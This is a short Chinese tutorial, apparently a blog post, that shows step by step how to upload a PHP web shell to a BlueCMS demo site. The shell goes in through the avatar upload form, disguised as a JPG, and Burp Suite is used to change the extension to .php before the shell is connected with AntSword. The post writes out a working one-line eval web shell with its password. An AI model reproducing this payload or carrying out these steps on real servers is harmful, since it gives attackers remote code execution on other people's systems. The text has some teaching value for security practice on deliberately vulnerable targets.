演示网站
第一步,打开浏览器,访问网址演示网站 - Powered by BlueCMS,如图所示(初次登录需要注册哦!):
![](https://img-blog.csdnimg.cn/img_convert/61d953ba0a7dd95f4efba4ffa4d24f56.png)
点击用户管理,找到我的个人资料,进行修改,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/1c7a1ee7a0daaba47e3b825a0aafd5e5.png)
上传头像,选择文件,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/9a14c7509f9a1d1753c193524676f6cb.png)
输入一句话木马<?php @eval($_POST['403']);?>,其中403为密码,后缀改为jpg等可支持文件。如图所示:
![](https://img-blog.csdnimg.cn/img_convert/b87685109915efa0663fe4843239c996.png)
![](https://img-blog.csdnimg.cn/img_convert/d3d03201d92dc8d512a6fe501cce3b4c.png)
本文使用burpsuit进行拦截,修改后缀名为php后放行,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/eff1fa276e67a2fdf42821c3b87dfd5f.png)
右键单击获取图片的url,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/8efa2817ce4a299bf67c89a57efa1534.png)
蚁剑
打开蚁剑,新建连接,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/45de96d35f59c0c4eb4aa1460bdae85f.png)
连接成功后保存就ok了,如图所示:
![](https://img-blog.csdnimg.cn/img_convert/d2560697305e13c7c212a62a8bdffef4.png)